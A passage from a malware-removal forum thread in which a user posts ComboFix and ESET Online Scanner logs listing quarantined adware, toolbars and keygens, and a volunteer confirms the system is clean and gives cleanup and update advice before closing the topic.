.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.kux\Shell\O(uOw[7bz *Sb*_\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|explorer|%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.M4V\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.MKV\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.MOV\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.MP4\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.MPEG\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.MPG\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.RM\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.RMVB\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_USERS\S-1-5-21-55330172-1766457534-1491637609-1000_Classes\SystemFileAssociations\.WMV\Shell\O(uOw[7bz  
N O0ROwQ\Command]
@="\"q:\\Program Files\\YouKu\\youkuclient\\YoukuDesktop.exe\" iku://|upload|file=%1|"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet006\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
--------------------- нµĶ̬ӿ ---------------------
.
- - - - - - - > 'Explorer.exe'(2436)
c:\users\THINK\AppData\Roaming\Thunder Network\Walkbox\walkboxext_1.4.2.90.dll
c:\users\Public\Thunder Network\KanKan\reghelper\xappex.1.1.1.73.(426).dll
c:\users\Public\Thunder Network\KanKan\Pusher\xappdrv.1.0.0.73.dll
c:\users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll
c:\program files\QMovie\QVODShellIcon.dll
c:\program files\ThinkPad\Bluetooth Software\btncopy.dll
q:\program files\Nokia\Nokia PC Suite 7\PhoneBrowser.dll
q:\program files\Nokia\Nokia PC Suite 7\NGSCM.DLL
q:\program files\Nokia\Nokia PC Suite 7\Lang\PhoneBrowser_chi-sc.nlr
q:\program files\Nokia\Nokia PC Suite 7\Resource\PhoneBrowser_Nokia.ngr
c:\program files\Lenovo\Drag-to-Disc\Shellex.dll
c:\windows\system32\DLAAPI_W.DLL
c:\program files\Lenovo\Drag-to-Disc\ShellRes.dll
.
------------------------ н ------------------------
.
c:\windows\system32\wbem\unsecapp.exe
c:\windows\system32\dllhost.exe
c:\windows\system32\dllhost.exe
c:\windows\system32\dllhost.exe
c:\windows\system32\dllhost.exe
c:\windows\system32\dllhost.exe
c:\windows\system32\dllhost.exe
c:\windows\system32\dllhost.exe
c:\users\THINK\Desktop\procexp_V15.40.0.0.4202571463.exe
.
**************************************************************************
.
ʱ: 2014-09-14  16:29:48 -
ComboFix-quarantined-files.txt  2014-09-14 20:29
.
Pre-Run: 6,489,427,968 ֽ
Post-Run: 6,207,209,472 ֽ
.
- - End Of File - - D9FB0EC6979142C0DD2CC2D175874FAC
5C616939100B85E558DA92B899A0FC36
 
========= End of CMD: =========
 
EmptyTemp: => Removed 285.8 MB temporary data.
 
 
The system needed a reboot. 
 
==== End of Fixlog ====
 
 
log.txt:
 
 
ESETSmartInstaller@High as downloader log:
all ok
ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7623
# api_version=3.0.2
# EOSSerial=fcb1938c3a1b65419dddc7b2865f6992
# engine=20160
# end=finished
# remove_checked=true
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2014-09-15 03:24:48
# local_time=2014-09-15 11:24:48 )
# country="People's Republic of China"
# lang=1033
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode_1=''
# compatibility_mode=5892 16776574 100 100 3080813 247402190 0 0
# scanned=550426
# found=15
# cleaned=14
# scan_time=11092
sh=566A8CD382F9397B07F6B28A6DD2DD6992410A02 ft=0 fh=0000000000000000 vn="Win32/Packed.Autoit.C.Gen potentially unwanted application" ac=I fn="C:\Users\All Users\VistaCodecs\{C02461FA-CBA3-4886-B3C3-BDD45D05B3C3}\Vista Codec Package.msi"
sh=71435DDB11E00D0243380C4902324853FE4ECE8F ft=1 fh=12b0cd2dde452d65 vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application (deleted (after the next restart) - quarantined)" ac=C fn="C:\Program Files\Avira\AntiVir Desktop\apnic.dll"
sh=FFA8B6510D624A55F3EB7FFD6D5221A44944681C ft=1 fh=3386eb0d6ed0e5e1 vn="a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application (deleted (after the next restart) - quarantined)" ac=C fn="C:\Program Files\Avira\AntiVir Desktop\apnstub.exe"
sh=1A3F14C0A66F9AF050D1F34FBACBAADC31751A07 ft=1 fh=2704a03a0f47b728 vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application (deleted (after the next restart) - quarantined)" ac=C fn="C:\Program Files\Avira\AntiVir Desktop\apntoolbarinstaller.exe"
sh=FD0483A45EF23EB4DEF1523906A28A4A5D3C0D77 ft=1 fh=fcf2e467b851cbbd vn="a variant of Win32/Bundled.Toolbar.Ask.D potentially unsafe application (deleted (after the next restart) - quarantined)" ac=C fn="C:\Program Files\Avira\AntiVir Desktop\Offercast_AVIRAV7_.exe"
sh=566A8CD382F9397B07F6B28A6DD2DD6992410A02 ft=0 fh=0000000000000000 vn="Win32/Packed.Autoit.C.Gen potentially unwanted application (deleted - quarantined)" ac=C fn="C:\ProgramData\VistaCodecs\{C02461FA-CBA3-4886-B3C3-BDD45D05B3C3}\Vista Codec Package.msi"
sh=B640049FEE63BF85D574F67D798B5FACFD03FE1E ft=0 fh=0000000000000000 vn="a variant of Android/SystemMonitor.A potentially unwanted application (deleted - quarantined)" ac=C fn="C:\Users\Public\QiYi\QiyiClient\apk\0\qiyi.407.apk"
sh=A3C199CE086BA2E1585022F2C2FD28B275C482D6 ft=0 fh=0000000000000000 vn="a variant of Android/SystemMonitor.A potentially unwanted application (deleted - quarantined)" ac=C fn="C:\Users\Public\QiYi\QiyiClient\apk\1\qiyi81.apk"
sh=F6DA94FBB24C2795F7CA6F3669F7B26133BC05C5 ft=0 fh=0000000000000000 vn="Win32/Toolbar.Conduit potentially unwanted application (deleted - quarantined)" ac=C fn="F:\Hero Fighter\HeroFighterToolbar.xpi"
sh=30308D6B5ED151C478D914AA7FC0BA4DB9E09096 ft=0 fh=0000000000000000 vn="a variant of Win32/Keygen.HA potentially unsafe application (deleted - quarantined)" ac=C fn="G:\ONONE_PERFECT_PHOTO_SUITE_PREMIUM_ED_V7.5.0-XFORCE.zip"
sh=7DE60A3AEAC96F7FA559D468D852FBDDA731391F ft=1 fh=3d20769bd48072ca vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application (deleted - quarantined)" ac=C fn="Q:\Program Files\FormatFactory\FFModules\Package\Ask\ApnIC.dll"
sh=DBA4D7540C69C6492D48E688A00B51387685F8A6 ft=1 fh=fb092140bceb8039 vn="a variant of Win32/Bundled.Toolbar.Ask.G potentially unsafe application (deleted - quarantined)" ac=C fn="Q:\Program Files\FormatFactory\FFModules\Package\Ask\ApnStub.exe"
sh=140308EF85F243BA4D2AAC012B1017B47E52B89E ft=1 fh=ffd7fdcd47cd63f7 vn="a variant of Win32/Bundled.Toolbar.Ask potentially unsafe application (deleted - quarantined)" ac=C fn="Q:\Program Files\FormatFactory\FFModules\Package\Ask\ApnToolbarInstaller.exe"
sh=44554E882D1DD6FBF71B6550B0687E3D9FD73711 ft=1 fh=b0638f029680e22d vn="a variant of Win32/Bundled.Toolbar.Ask.D potentially unsafe application (deleted - quarantined)" ac=C fn="Q:\Program Files\FormatFactory\FFModules\Package\Ask\AskPIP_FF_.exe"
sh=21901D59A0EB32C194F8F71E98F22A0FF3CE04DE ft=1 fh=8f287399d4deb8fc vn="a variant of Win32/Keygen.AG potentially unsafe application (deleted - quarantined)" ac=C fn="Q:\Program Files\IDM Computer Solutions\UltraEdit-32\KeyGen.exe"
ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7623
# api_version=3.0.2
# EOSSerial=fcb1938c3a1b65419dddc7b2865f6992
# engine=20169
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2014-09-16 01:43:40
# local_time=2014-09-15 09:43:40 )
# country="People's Republic of China"
# lang=1033
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode_1=''
# compatibility_mode=5892 16776574 100 100 3117945 247439322 0 0
# scanned=508454
# found=0
# cleaned=0
# scan_time=11607
 
 
and FRST.txt is in attachmentAttached File  FRST.txt   64.85KB   1 downloads
 
 
 
 


#6 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:34 PM

Posted 16 September 2014 - 06:44 AM

Ok, it's looking good now.

That's it! Your logs look clean to me at the moment.
We're gonna clean up everything now, close security holes on your computer and in the end I'll provide you with a list of security tips so you hopefully will not need our help anymore in the future.


My help is free for everybody.
If you want to support me fighting against malware or buy me a beer for the assistance you received, then you can consider a donation: btn_donate_SM.gif.
Thank you!



Clean Up

Now we remove all the tools we used (including their logs and quarantine folders), restore your settings and delete old and infected system restorepoints:
  • You can uninstall programs that you had to install (e.g. MBAM or ESET Onlinescanner) in the control panel if you so wish.
  • Rename Combofix.exe in Uninstall.exe and execute it with a double click. (Beware that file extensions might be hidden. So don't add a double extension Uninstall.exe.exe.)
  • Download DelFix (by Xplode) and save it to your Desktop.
    • Close all running programs and start delfix.exe.
    • Make sure that all available options are checked.
    • Click on Run
    • DelFix should remove all our tools and delete itself afterwards. I don't need the log file.
  • If there is still something left you can delete it manually.


Closing security holes

Many infections happen via drive-by downloads that run unnoticed in the background while the user visits an infected website. To achieve this malware exploits security holes in installed software (e.g. browser or its plugins). Older versions of such software often have lots of known exploitable holes. Therefore it's very important to always keep your software up-to-date.
The following software is outdated. Make sure you remove all old versions and install the current one instead if you need the program:

Adobe Flash Player 14 Plugin
Java™ 7




Tips

I recommend to read and follow the "16 simple and easy ways to keep your computer safe and secure on the Internet" (Link) by Lawrence Abrams.

#7 firzenj

firzenj
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:34 AM

Posted 16 September 2014 - 12:32 PM

Yes, I have done what you advised.

 

Thank for your help again! :thumbup2:



#8 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:34 PM

Posted 16 September 2014 - 12:50 PM

You're very welcome.
All the best.

#9 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:34 PM

Posted 16 September 2014 - 12:50 PM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users